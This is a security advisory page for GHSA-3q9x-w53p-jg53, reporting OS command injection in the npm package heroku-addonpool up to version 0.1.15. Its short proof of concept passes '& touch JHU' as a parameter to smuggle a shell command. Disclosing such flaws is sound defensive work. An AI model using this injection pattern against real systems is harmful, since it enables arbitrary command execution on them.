GHSA-3q9x-w53p-jg53

    Dashboard / Vulnerabilities / GHSA-3q9x-w53p-jg53

    GHSA-3q9x-w53p-jg53

    Published: 9 Dec 2021Last Modified: 13 Mar 2026
    Aliases:

    Summary: OS Command Injection in heroku-addonpool

    Details: heroku-addonpool through 0.1.15 is vulnerable to Command Injection. The second parameter of the exported function `HerokuAddonPool(id, app, opt)` can be controlled by users without any sanitization. **PoC** ```js var Root = require("heroku-addonpool"); var root = Root("sss", "& touch JHU", {}); root.setup(); ```

    Affected packages

    Package

    Name: heroku-addonpool

    Purl: pkg:npm/heroku-addonpool

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -0.1.16

    Affected versions

    Common Vulnerability Scoring System

    Attack Vector
    Network
    Adjacent
    Local
    Physical
    Privileges Required
    None
    Low
    High
    User Interaction
    None
    Required
    Scope
    Unchanged
    Changed
    Confidentiality
    None
    Low
    High
    Integrity
    None
    Low
    High
    Availability
    None
    Low
    High
    GHSA-3q9x-w53p-jg53 | CVE-DB